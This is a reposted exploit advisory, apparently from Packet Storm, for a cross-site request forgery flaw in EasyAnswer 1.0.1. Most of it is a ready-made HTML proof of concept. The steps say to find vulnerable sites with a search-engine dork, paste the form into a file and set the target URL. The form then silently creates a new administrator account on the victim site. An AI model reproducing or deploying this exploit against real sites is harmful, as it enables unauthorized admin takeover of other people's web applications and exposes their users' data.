Security
Headlines
HeadlinesLatestCVEs

Headline

EasyAnswer 1.0.1 Cross Site Request Forgery

EasyAnswer version 1.0.1 suffers from a cross site request forgery vulnerability.

Packet Storm
Open in Source
#csrf#vulnerability#windows#google#php#auth#firefox

====================================================================================================================================
| # Title : EasyAnswer version 1.0.1 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit) |
| # Vendor : https://www.codester.com/items/40311/ |
| # Dork : “© 2022 Easy Answer All rights reserved.” |
====================================================================================================================================

poc :

[+] infected file: admins-create.php

[+] Inside folder /admin/admins-create.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 17.

[+] Set the target site link Save changes and apply .

</i>Create Administrator</h2>
</div>
</div>
</div>
</div>
</div>

                <div class="row">  
        <div class="col-md-12 stretch-card">  
          <div class="card">

                          <div class="card-body">

                            <div id="messages">  
                             </div>

             <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">  
             <input type="hidden" id="submitform" name="submitform" value="1">

                              <div class="form-group row">  
                  <label for="username" class="col-sm-2 col-form-label">Username:</label>  
                  <div class="col-sm-12">  
                    <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">  
                  </div>  
             </div>  
             <div class="form-group row">  
                  <label for="password" class="col-sm-2 col-form-label">Password:</label>  
                  <div class="col-sm-12">  
                    <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">  
                  </div>  
             </div>

                              <div class="form-group row">  
                  <label for="email" class="col-sm-2 col-form-label">E-Mail:</label>  
                  <div class="col-sm-12">  
                    <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">  
                  </div>  
             </div>

                              <div class="row-spaces"></div>

                              <p>  
              <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>  
             </p>  
            </form>

                                          </div>  
         </div>  
        </div>  
       </div>

                       </div>

Greetings to :===================================================================================

jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution
Packet Storm